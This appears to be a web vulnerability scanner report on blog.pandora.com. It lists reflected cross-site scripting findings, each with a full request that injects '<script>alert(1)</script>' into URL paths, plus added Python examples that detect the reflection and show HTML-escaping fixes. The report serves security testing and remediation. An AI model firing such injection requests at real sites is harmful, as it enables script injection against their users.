GET /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea349<script>alert(1)</script>9480ff2f53c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffb3<script>alert(1)</script>60fe94bbc36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a52fa<script>alert(1)</script>042e399b16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdcd4<script>alert(1)</script>10f75eed66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 346

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a34c<script>alert(1)</script>3ef283336f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5dd40<script>alert(1)</script>d3e39760b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 347

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 711ea<script>alert(1)</script>7529f0abeb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /press711ea<script>alert(1)</script>7529f0abeb0 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /press711ea<script>alert(1)</script>7529f0abeb0 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98567<script>alert(1)</script>eadbbafd7b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show98567<script>alert(1)</script>eadbbafd7b9 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /show98567<script>alert(1)</script>eadbbafd7b9 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33cf5<script>alert(1)</script>c76f8eb676e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show33cf5<script>alert(1)</script>c76f8eb676e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /show33cf5<script>alert(1)</script>c76f8eb676e/ was not found on this server.</p>
...[SNIP]...
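All of the reflected XSS findings above share one mechanism: the 404 handler puts the requested URL into a text node without HTML-encoding it. The following is an added example, written for this page and not taken from the scanner or from the site; it simulates that handler in both its vulnerable and its hardened form (the real handler is not on the page, so PAGE_404 is a constructed template that mirrors the 404 body shown above) and reproduces the "echoed unmodified" verdict the findings rely on, using the marker from the first finding. It also checks the two facts that make a raw reflection exploitable in a browser: the response is rendered as HTML, and the marker came back byte-for-byte. The percent-encoded request target is an assumption about how a browser would send the crafted link.

```python
"""Reflection check for a 404 page that echoes the request path.

Added example, not the scanner's output or the site's code. PAGE_404 is a
constructed stand-in for the server's 404 handler, modelled on the body
shown in the findings above.
"""
import html
from urllib.parse import unquote

# Constructed template mirroring the 404 body in the findings above.
PAGE_404 = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head>\n<title>404 Not Found</title>\n</head><body>\n"
    "<h1>Not Found</h1>\n"
    "<p>The requested URL {uri} was not found on this server.</p>\n"
    "</body></html>\n"
)


def not_found_vulnerable(request_target: str) -> str:
    """Vulnerable handler: the percent-decoded request target is placed
    between tags with no HTML encoding, so '<' and '>' reach the parser."""
    return PAGE_404.format(uri=unquote(request_target))


def not_found_hardened(request_target: str) -> str:
    """Hardened handler: the same text node, HTML-encoded first.
    html.escape turns < > & " ' into entities, which is the right encoding
    for a text node (attribute and script contexts need different rules)."""
    return PAGE_404.format(uri=html.escape(unquote(request_target), quote=True))


def classify_reflection(payload: str, body: str) -> str:
    """How did the probe come back?
    'raw'     - byte-for-byte, so the injected tags are live markup
    'encoded' - present only with < > (and quotes) turned into entities
    'absent'  - not reflected at all
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "encoded"
    return "absent"


def assess(status_line: str, headers: dict, body: str, payload: str) -> dict:
    """Combine the reflection verdict with whether the browser will treat the
    body as HTML. A 404 status is no protection: browsers render 404 bodies
    like any other page, but a non-HTML Content-Type would stop execution."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    reflection = classify_reflection(payload, body)
    return {
        "status": status_line.split(" ", 2)[1],
        "rendered_as_html": ctype == "text/html",
        "reflection": reflection,
        "exploitable": reflection == "raw" and ctype == "text/html",
    }


# Marker from the first finding above. A browser sends the path
# percent-encoded (assumption), which the handler decodes back to raw tags.
PROBE = "2b6f7<script>alert(1)</script>7fd9127d43b"
ENCODED_TARGET = "/pandora2b6f7%3Cscript%3Ealert(1)%3C/script%3E7fd9127d43b/jquery.dimension.js"
RESPONSE_HEADERS = {"Server": "Apache/2.2.9 (Debian)", "Content-Type": "text/html"}


def run_demo() -> dict:
    """Assess both handlers against the same probe."""
    return {
        name: assess("HTTP/1.1 404 Page Not Found", RESPONSE_HEADERS, handler(ENCODED_TARGET), PROBE)
        for name, handler in (("vulnerable", not_found_vulnerable), ("hardened", not_found_hardened))
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

The hardened handler fixes the text-node context only; if the URL were also written into an attribute or a script block, each of those sinks would need its own encoding. When re-testing a fix, keep the random prefix and suffix around the tag as the scanner does, so the reflection can be located even when the page contains other script tags.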
The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:
cmd
business
item_name
bn
add
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /pandora/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:03 GMT
ETag: "7cc51b-9333-498819d3bfcc0"
Accept-Ranges: bytes
Content-Length: 37683
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
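The three passive findings above (a form that POSTs to www.paypal.com, a script included from an external domain, and e-mail addresses in the response body) are all things that can be picked out of a response by parsing its HTML. The following is an added example, written for this page and not the scanner's own logic: it collects every form with its field names and every external script, compares their origins with the page's origin the way the browser's same-origin policy does, and extracts e-mail addresses. The sample markup is constructed to mirror the findings; the PayPal action path, the static.example-cdn.test script, the search form and the field values are assumptions, not the blog's actual markup.

```python
"""Passive checks for cross-origin form targets, cross-origin scripts and
e-mail addresses in a response body.

Added example, not the scanner's code. SAMPLE_HTML is constructed for the
demonstration; only the PayPal field names and the tour@pandora.com address
come from the findings above.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def origin(url: str) -> tuple:
    """(scheme, host, port): the tuple the same-origin policy compares."""
    p = urlsplit(url)
    port = p.port or (443 if p.scheme == "https" else 80)
    return (p.scheme.lower(), (p.hostname or "").lower(), port)


class ResponseCollector(HTMLParser):
    """Collect every form (with its field names) and every external script."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self.scripts = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {
                "action": urljoin(self.page_url, a.get("action") or ""),
                "method": (a.get("method") or "get").upper(),
                "fields": [],
            }
            self.forms.append(self._form)
        elif tag in ("input", "select", "textarea", "button") and self._form is not None:
            if a.get("name"):
                self._form["fields"].append(a["name"])
        elif tag == "script" and a.get("src"):
            # Keep the SRI hash too: a cross-origin script with a valid
            # integrity attribute cannot be swapped for a different file.
            self.scripts.append({"src": urljoin(self.page_url, a["src"]),
                                 "integrity": a.get("integrity")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def analyse(page_url: str, body: str) -> dict:
    """Return the three kinds of finding for one response."""
    c = ResponseCollector(page_url)
    c.feed(body)
    c.close()
    me = origin(page_url)
    return {
        "cross_domain_forms": [f for f in c.forms if origin(f["action"]) != me],
        "cross_domain_scripts": [s for s in c.scripts if origin(s["src"]) != me],
        "emails": sorted(set(EMAIL_RE.findall(body))),
    }


# Constructed sample modelled on the findings above (paths and the CDN host
# are assumptions).
SAMPLE_PAGE_URL = "http://blog.pandora.com/pandora/archives/2007/07/"
SAMPLE_HTML = """<html><head>
<script src="/pandora/jquery.js"></script>
<script src="http://static.example-cdn.test/widget.js"></script>
</head><body>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
  <input type="hidden" name="cmd" value="">
  <input type="hidden" name="business" value="">
  <input type="hidden" name="item_name" value="">
  <input type="hidden" name="bn" value="">
  <input type="hidden" name="add" value="">
  <input type="submit" value="Add to cart">
</form>
<form action="/pandora/search" method="get"><input name="q"></form>
<p>Questions? Email <a href="mailto:tour@pandora.com ">tour@pandora.com</a>.</p>
</body></html>
"""

if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_PAGE_URL, SAMPLE_HTML), indent=2))
```

Each cross-domain form is reported with its field names so that the review the background text asks for (what data leaves the origin, and whether that domain should be trusted with it) can be done from the list. For cross-origin scripts that cannot be hosted locally, an integrity attribute (Subresource Integrity) is the current mitigation for the modification risk described above; the collector records it so such includes can be separated from unpinned ones.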
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/ HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:35:26 GMT
ETag: "79e071-b926-499493c0d2780"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 47398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]...
<p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:15 GMT
ETag: "79e066-3a17-498819df317c0"
Accept-Ranges: bytes
Content-Length: 14871
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
month for all of us at Pandora has been the opportunity to interact with all of you. We want to have the same kind of relationship with all of our listeners. Please don't hesitate to send us an email (pandora-support@pandora.com) with your thoughts, feedback, ideas, and comments. We're still listening!</p> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
